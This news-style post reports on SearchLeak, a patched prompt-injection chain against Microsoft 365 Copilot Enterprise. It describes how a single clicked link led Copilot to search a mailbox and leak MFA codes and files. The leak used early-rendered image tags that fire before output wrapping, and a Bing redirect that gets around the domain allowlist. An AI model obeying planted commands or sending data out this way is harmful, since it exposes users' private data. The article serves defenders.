Microsoft Copilot security
The Copilot Flaw That Exposed a Bigger AI Problem
Posted inBattery Technology

The Copilot Flaw That Exposed a Bigger AI Problem

No Comments

One Click Was All It Took to Trick Copilot Into Leaking Your Secrets

Imagine clicking a normal-looking link in an email and, without typing a single word, handing over your two-factor codes, private messages, and work files to a stranger. That’s the scenario security researchers built to expose a serious weakness in Microsoft’s AI assistant, and it says a lot about how fragile the walls around private data really are.

  • A patched Copilot bug let attackers pull 2FA codes and business files with a single click.
  • The trick worked by hiding commands where Copilot couldn’t tell friend from foe.
  • The patch closed this hole, but the deeper flaw behind it stays open.

How the Attack Worked

Researchers at the security firm Varonis built an exploit chain they called SearchLeak. Varonis Threat Labs described it as a critical vulnerability chain in Microsoft 365 Copilot Enterprise that lets an attacker steal sensitive data, including MFA codes, email messages, and meeting details. The flaw is now tracked as CVE-2026-42824, and it was discovered and reported to Microsoft by the researchers. Microsoft patched it the week before the team went public.

The clever part is how little the victim had to do. The three-stage attack is now fixed, but it belongs to a new group of AI prompt-injection issues that hide commands inside URLs and other variables. The attacker emailed the target a specially built link. One click sent Copilot off to search the person’s own mailbox, grab sensitive content, and quietly ship it out. The victim never typed a prompt or approved anything.

Why the Guardrails Failed

Microsoft, like other AI providers, leans on a stack of safety rules to stop this kind of thing. One rule wraps Copilot’s output in code blocks so the browser treats it as plain text instead of live code. Another limits which websites Copilot is allowed to contact without a clear okay. While Copilot can freely send requests to Microsoft domains, those rules clamp down on requests to untrusted sites.

The exploit hopped over both. The researchers found that the text-wrapping protection only kicks in after Copilot finishes its “thinking” phase. Before that moment, Copilot builds its answer using raw HTML, which the browser renders for a split second. If that answer contains an image tag, the browser fires off a request to fetch the image right away. By the time the safety wrapper arrives, the request has already left the building.

That handled the timing problem. The website problem was solved with a workaround that used Bing as a middleman. Because Bing sits on Copilot’s approved list, the attack routed the stolen data through a Bing image-search URL, which then forwarded the request to a server the attacker controlled. The secret information landed neatly in that server’s logs.

A Bug You Can Patch, a Flaw You Can’t

Microsoft fixed the specific holes that SearchLeak abused. The harder issue is the one underneath. Large language models can’t reliably tell the difference between a real instruction from you and a fake one hidden inside content they’re reading. An email, a web page, or a sneaky query string can all carry commands that the model treats as legitimate.

That gullibility is why these tools keep needing patch after patch. Each fix blocks a known path, but the root weakness stays put, so researchers and attackers keep finding fresh ways around the latest set of rules. Protecting private data through AI assistants is an ongoing job, not a one-time fix, and that’s exactly the lesson here.

The stakes climb fast in a business setting. SearchLeak targets Microsoft 365 Copilot Enterprise, which means a successful attack could reach far past one person’s inbox into meeting notes, SharePoint documents, OneDrive files, and other indexed company content. Depending on how an organization wires up its systems, the reach could stretch even further.

What Smart Teams Should Do Next

The practical message is simple. Treat AI assistants as helpful but easily fooled coworkers, not as locked vaults. Limit what each account can actually see, since an assistant can only leak data the user already has access to. Be cautious with links, even ones that appear to come from trusted Microsoft domains. And keep an eye on vendor updates, because the patch cycle for these tools is going to stay busy.

AI assistants are useful, and they’re not going anywhere. The challenge is building real boundaries around the private information they touch, so a single click can’t quietly turn a productivity tool into a leak. Until models can tell a genuine command from a planted one, careful access controls and a healthy dose of skepticism are your best defense.

Tags:

Comments

No comments yet. Why don’t you start the discussion?

Leave a Reply

Your email address will not be published. Required fields are marked *